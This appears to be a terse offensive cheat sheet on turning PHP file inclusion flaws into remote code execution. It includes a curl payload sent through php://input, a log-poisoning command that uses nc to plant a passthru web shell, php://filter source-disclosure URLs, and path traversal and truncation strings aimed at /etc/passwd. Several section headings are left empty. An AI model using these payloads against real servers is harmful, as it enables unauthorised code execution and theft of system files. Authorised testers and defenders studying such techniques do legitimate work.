• including uploaded files
  • include data:// or php://input, php://filter pseudo protocol
  • including logs
  • including /proc/self/environ
  • include session files - (usually names /tmp/sess_SESSIONID)
  • include other files created by PHP application
  • C:\Windows\Temp\php<16-bit-random>.TMP without bruteforce can do inc=C:\Windows\Temp\php<<

Path Traversal



RCE with TXT upload

Expose .txt file and use a vulnerable include to include the txt file into code (evil.txt.php).

PHP config can be used to disable URL file access. But still local files can be accessed (allow_url_fopen / allow_url_include)

RCE with Logs

  • Use NC to write logs with malicious content to access_logs.
  • Connect and just send the attack string (In user-agent etc.).
  • Then include the log file (local file inclusion)

RCE over SQLi

Return <?php echo "test"?> from SQL and see results to check if RCE is possible over SQLi


PHP Wrappers

  • File upload with POST data
    • curl -s --data "<?system('ls -la');?>" "http://target.host/web.php?file_path=php://input%00"
  • Base64 encode the LFI
    • http://X.X.X.X/?page=php://filter/convert.base64-encode/resource=(PHP FILE NAME NO EXTENSION)



/proc/self/fd/XX: http://pastebin.com/raw.php?i=cRYvK4jb

Null Byte Injection:
Directory Listing with Null Byte Injection:
Path Truncation:
?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ...
Dot Truncation:
Reverse Path Truncation:
?file=../../../../ [] ../../../../../etc/passwd

nc <IP> <port> GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1 Host: <IP> Connection: close

Including Remote Code:
Using PHP stream php://input:
Specify your payload in the POST parameters
Using PHP stream php://filter:
Using data URIs: